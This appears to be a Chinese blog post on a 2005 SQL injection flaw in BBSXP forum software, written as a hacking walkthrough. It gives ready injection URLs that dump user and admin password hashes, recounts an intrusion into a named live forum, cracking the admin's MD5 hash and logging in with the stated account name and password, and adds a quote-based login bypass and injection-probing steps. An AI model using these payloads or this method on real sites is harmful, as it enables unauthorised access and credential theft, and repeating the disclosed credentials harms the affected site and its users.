BBSXP最新漏洞
漏洞日期:2005年7月1日
受害版本號(hào):眼下全部BBSXP
漏洞利用:
查前臺(tái)password注入語(yǔ)句:
blog.asp?id=1%20union%20select%201,1,userpass,username,1,1,1%20from%20[user]%20where%20membercode=5
查后臺(tái)password注入語(yǔ)句:
blog.asp?id=1%20union%20select%201,1,adminpassword,username,1,1,1%20from%20[user]%20where%20membercode=5
首先打開
www.google.com
在輸入Po......bBsxp5.15有非常多這種論壇,隨便點(diǎn)個(gè),好就這個(gè)bbs.yuntea.com 真幸運(yùn),這個(gè)站還沒(méi)打上補(bǔ)丁,一口做氣殺究竟,bbsxp5.15最新漏洞?
漏洞主要出在BLOG.ASP 能夠讓直接構(gòu)造數(shù)據(jù)庫(kù)命令??
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]?
后臺(tái)區(qū)長(zhǎng)的md5password就顯示出來(lái)了。?
前臺(tái)password也能夠出來(lái),?
網(wǎng)上已經(jīng)有相關(guān)動(dòng)畫,軟件。?
就利用這個(gè)漏洞,肯定有一批bbsxp的站點(diǎn)要倒下了?
接下來(lái)就是講工具了,準(zhǔn)備好MD5password破解器?
關(guān)于md5的破解,比較好使的有md5cracker速度增強(qiáng)版。?
1。先用8位或9位數(shù)字跑。非常快。?
2。假設(shè)不行,用小寫字母跑。選擇5-6位比較好。?
3。再不行,說(shuō)明password可能使字母加數(shù)字,能夠碰碰運(yùn)氣。能夠配置一個(gè)精品自典,比方10G的,?
?? 跑上及幾個(gè)小時(shí)。(你的機(jī)器配置必須非常好)?
4。再不行,建議放棄,太變態(tài)了。?
前臺(tái)ok...后臺(tái)password..(注:你必須知道管理員的帳號(hào))?
直接默認(rèn)的配置就是直接拿下后臺(tái)password...?
直接吧前臺(tái)md5password暴出來(lái)。?
剩下的事就事破解md5了。?
如今開始進(jìn)行工作了,在
http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig
]?
就成了
http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig
]?
他的password是7CB2BE65EB9F215215A0725A10B6E39E可能前臺(tái)的password和后臺(tái)一樣,假設(shè)有2個(gè)加密password那就是代表1個(gè)是前臺(tái)的一個(gè)是后臺(tái)的,不多說(shuō)了,看操作?
依照上面工具的介紹先用數(shù)字把,?
正在破===耐心等等?
我接條信息,大家不介意把~?
出來(lái)了,password是82246124,登入,,他的帳號(hào)是wzwu,password82246124,登入成功,后臺(tái)登入,password82246124,登入成功,以下的因該知道把,我也就不多說(shuō)了,以免遭到人家的痛罵。?
bBsxp5.15最新漏洞的原始作者不清
74D2710BD75C06A057E842C8CA55C576
名'or''='password也是'or''='
?'
一般ASP系統(tǒng)都有相似以下的URL:http://www.xxx.com/xxx.ASP?ID=××,我們僅僅往在這種URL后加上一個(gè)單引號(hào),假設(shè)返回server錯(cuò)誤信息,那么就說(shuō)明了程序并沒(méi)有過(guò)濾單引號(hào),并且從返回的錯(cuò)誤信息中的了能夠得到server的一些相關(guān)配置信息。接著接交http:/www.xxx.com/xxx.asp?id=××
????? and 1=1、http:/www.xxx.com/xx.asp?id=×× and
????? 1=2,假設(shè)返回的頁(yè)面不一樣,說(shuō)明頁(yè)面能夠注入。
更多文章、技術(shù)交流、商務(wù)合作、聯(lián)系博主
微信掃碼或搜索:z360901061

微信掃一掃加我為好友
QQ號(hào)聯(lián)系: 360901061
您的支持是博主寫作最大的動(dòng)力,如果您喜歡我的文章,感覺我的文章對(duì)您有幫助,請(qǐng)用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點(diǎn)擊下面給點(diǎn)支持吧,站長(zhǎng)非常感激您!手機(jī)微信長(zhǎng)按不能支付解決辦法:請(qǐng)將微信支付二維碼保存到相冊(cè),切換到微信,然后點(diǎn)擊微信右上角掃一掃功能,選擇支付二維碼完成支付。
【本文對(duì)您有幫助就好】元
